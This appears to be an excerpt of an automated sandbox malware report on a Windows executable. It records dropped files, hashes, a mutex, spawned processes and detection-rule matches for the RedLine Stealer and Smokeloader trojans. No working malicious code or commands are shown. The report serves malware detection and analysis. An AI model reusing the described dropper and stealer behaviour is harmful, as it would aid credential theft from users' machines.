                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_004373D90_2_004373D9
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_0042D4EE0_2_0042D4EE
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_004274840_2_00427484
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_004285600_2_00428560
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_0043D6780_2_0043D678
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_004166AF0_2_004166AF
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_004137250_2_00413725
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_004277F60_2_004277F6
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_0040E9740_2_0040E974
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_0042EAE00_2_0042EAE0
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_00427AA00_2_00427AA0
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_00418AAF0_2_00418AAF
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_00436CBF0_2_00436CBF
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_00427D670_2_00427D67
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_00413F0B0_2_00413F0B
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_021482890_2_02148289
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_0214ED470_2_0214ED47
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_021341720_2_02134172
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_021476EB0_2_021476EB
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_0214D7550_2_0214D755
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_021487C70_2_021487C7
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_02147A5D0_2_02147A5D
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_0212EBDB0_2_0212EBDB
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_021369160_2_02136916
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_0213398C0_2_0213398C
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_02156F260_2_02156F26
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_02147FCE0_2_02147FCE
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_02138D160_2_02138D16
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_02147D070_2_02147D07
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_0214ED470_2_0214ED47
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0040B44C2_2_0040B44C
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004087902_2_00408790
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004260542_2_00426054
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0043B0682_2_0043B068
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004140702_2_00414070
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0043C0202_2_0043C020
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004398302_2_00439830
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0043D8302_2_0043D830
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0041B0E12_2_0041B0E1
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0041F0E02_2_0041F0E0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004210E02_2_004210E0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004358902_2_00435890
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004340982_2_00434098
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0043D0A02_2_0043D0A0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004180A92_2_004180A9
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0040A9402_2_0040A940
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0041714B2_2_0041714B
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0040C9172_2_0040C917
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0042B12C2_2_0042B12C
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0042F1302_2_0042F130
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0042B1C02_2_0042B1C0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0041D9E02_2_0041D9E0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004361E02_2_004361E0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004111E52_2_004111E5
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004059F02_2_004059F0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004239F22_2_004239F2
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0043C1F02_2_0043C1F0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0040F9FD2_2_0040F9FD
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004259902_2_00425990
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0043B9A12_2_0043B9A1
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004062502_2_00406250
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0041D2702_2_0041D270
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_00424A742_2_00424A74
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004092302_2_00409230
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_00423A342_2_00423A34
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004192DA2_2_004192DA
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0043D2F02_2_0043D2F0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0043C2802_2_0043C280
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004152982_2_00415298
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004082AE2_2_004082AE
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004252BA2_2_004252BA
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0041CB052_2_0041CB05
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_00428BC02_2_00428BC0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004143C22_2_004143C2
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_00402BD02_2_00402BD0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_00428BE92_2_00428BE9
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004373992_2_00437399
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004393A02_2_004393A0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_00416BA52_2_00416BA5
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004293AA2_2_004293AA
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004223B82_2_004223B8
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_00436C002_2_00436C00
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004234102_2_00423410
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0042B4FC2_2_0042B4FC
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_00404CB02_2_00404CB0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004074B02_2_004074B0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0041DD502_2_0041DD50
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004185782_2_00418578
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0042D57E2_2_0042D57E
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004245022_2_00424502
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_00421D102_2_00421D10
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0040DD252_2_0040DD25
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0041D5E02_2_0041D5E0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004175822_2_00417582
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0043D5802_2_0043D580
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_00427DA22_2_00427DA2
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004205B02_2_004205B0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0042C64A2_2_0042C64A
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_00426E502_2_00426E50
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0042B4F72_2_0042B4F7
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0043462A2_2_0043462A
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004356302_2_00435630
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004066E02_2_004066E0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0042C6E42_2_0042C6E4
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_00430EF02_2_00430EF0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004256F92_2_004256F9
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_00422E932_2_00422E93
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_00425E902_2_00425E90
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004156A02_2_004156A0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0041BEA02_2_0041BEA0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_00438EA02_2_00438EA0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_00435EA02_2_00435EA0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_00405EB02_2_00405EB0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0041C6BB2_2_0041C6BB
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_00415F662_2_00415F66
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004197702_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004097002_2_00409700
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0042C7262_2_0042C726
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0042C7352_2_0042C735
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0041DF802_2_0041DF80
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_00402FA02_2_00402FA0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024B32072_2_024B3207
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024EB2CF2_2_024EB2CF
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024E42FF2_2_024E42FF
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024CB3482_2_024CB348
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024C734A2_2_024C734A
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024D13472_2_024D1347
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024CF3472_2_024CF347
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024ED3072_2_024ED307
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024B83C72_2_024B83C7
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024DF3972_2_024DF397
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024DB3932_2_024DB393
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024C73B22_2_024C73B2
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024D80092_2_024D8009
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024BC0E82_2_024BC0E8
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024E11572_2_024E1157
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024D81082_2_024D8108
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024E91072_2_024E9107
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024E61072_2_024E6107
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024B61172_2_024B6117
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024CE1E72_2_024CE1E7
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024CC1AC2_2_024CC1AC
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024E96072_2_024E9607
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024D96112_2_024D9611
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024DB7632_2_024DB763
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024B77172_2_024B7717
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024C87DF2_2_024C87DF
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024DD7E52_2_024DD7E5
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024ED7E72_2_024ED7E7
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024C144C2_2_024C144C
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024E64472_2_024E6447
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024DB4272_2_024DB427
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024CD4D72_2_024CD4D7
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024B94972_2_024B9497
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024B64B72_2_024B64B7
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024C95412_2_024C9541
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024ED5572_2_024ED557
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024CC5282_2_024CC528
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024B45D72_2_024B45D7
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024E5AF72_2_024E5AF7
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024EDA972_2_024EDA97
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024E9A972_2_024E9A97
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024BCB7E2_2_024BCB7E
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024D5BF72_2_024D5BF7
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024C7BA72_2_024C7BA7
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024BABA72_2_024BABA7
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024CD8472_2_024CD847
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024DB75E2_2_024DB75E
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024D08172_2_024D0817
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024E58972_2_024E5897
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024E48912_2_024E4891
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024DC8B12_2_024DC8B1
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024DC94B2_2_024DC94B
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024B69472_2_024B6947
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024B99672_2_024B9967
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024CC9212_2_024CC921
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024C99D72_2_024C99D7
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024B89F72_2_024B89F7
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024DC98D2_2_024DC98D
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024DC99C2_2_024DC99C
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024E6E672_2_024E6E67
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024B2E372_2_024B2E37
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024D1F772_2_024D1F77
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024B4F172_2_024B4F17
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024C8F352_2_024C8F35
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024BDF8C2_2_024BDF8C
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024CDFB72_2_024CDFB7
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024CDC472_2_024CDC47
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024B5C572_2_024B5C57
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024BFC642_2_024BFC64
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024EBC082_2_024EBC08
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024B3C272_2_024B3C27
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024D4CF42_2_024D4CF4
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024D3C9B2_2_024D3C9B
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe 580B4B31B7215EB5FFF2396E350607376DE72AFEF4B3A7E3D841E14081F5E9CB
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe 580B4B31B7215EB5FFF2396E350607376DE72AFEF4B3A7E3D841E14081F5E9CB
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: String function: 024B81D7 appears 78 times
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: String function: 024C42C7 appears 74 times
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: String function: 00414060 appears 74 times
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: String function: 00407F70 appears 46 times
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: String function: 00410720 appears 53 times
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: String function: 02130019 appears 121 times
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: String function: 0040F903 appears 36 times
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: String function: 0040FDB2 appears 124 times
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: String function: 02130987 appears 53 times
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 1636
                Source: ScreenUpdateSync[1].exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                Source: 8BB0.tmp.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                Source: DG55Gu1yGM.exeBinary or memory string: OriginalFileName vs DG55Gu1yGM.exe
                Source: DG55Gu1yGM.exe, 00000000.00000000.2108834576.000000000047D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesOdilemio@ vs DG55Gu1yGM.exe
                Source: DG55Gu1yGM.exe, 00000000.00000003.2117383067.0000000002190000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs DG55Gu1yGM.exe
                Source: DG55Gu1yGM.exe, 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs DG55Gu1yGM.exe
                Source: DG55Gu1yGM.exe, 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs DG55Gu1yGM.exe
                Source: DG55Gu1yGM.exeBinary or memory string: OriginalFilenamesOdilemio@ vs DG55Gu1yGM.exe
                Source: DG55Gu1yGM.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 00000002.00000002.2550594932.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000002.4557098712.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: ScreenUpdateSync[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 8BB0.tmp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.evad.winEXE@4/7@11/5
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_004B07A6 CreateToolhelp32Snapshot,Module32First,0_2_004B07A6
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_004361E0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,2_2_004361E0
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\track_prt[1].htmJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeMutant created: \Sessions\1\BaseNamedObjects\5rjtejk5rytrr
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5064
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeFile created: C:\Users\user\AppData\Local\Temp\8BB0.tmpJump to behavior
                Source: DG55Gu1yGM.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: DG55Gu1yGM.exeVirustotal: Detection: 43%
                Source: DG55Gu1yGM.exeReversingLabs: Detection: 42%
                Source: unknownProcess created: C:\Users\user\Desktop\DG55Gu1yGM.exe "C:\Users\user\Desktop\DG55Gu1yGM.exe"
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeProcess created: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe "C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe"
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 1636
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeProcess created: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe "C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe" Jump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: msvcr100.dllJump to behavior
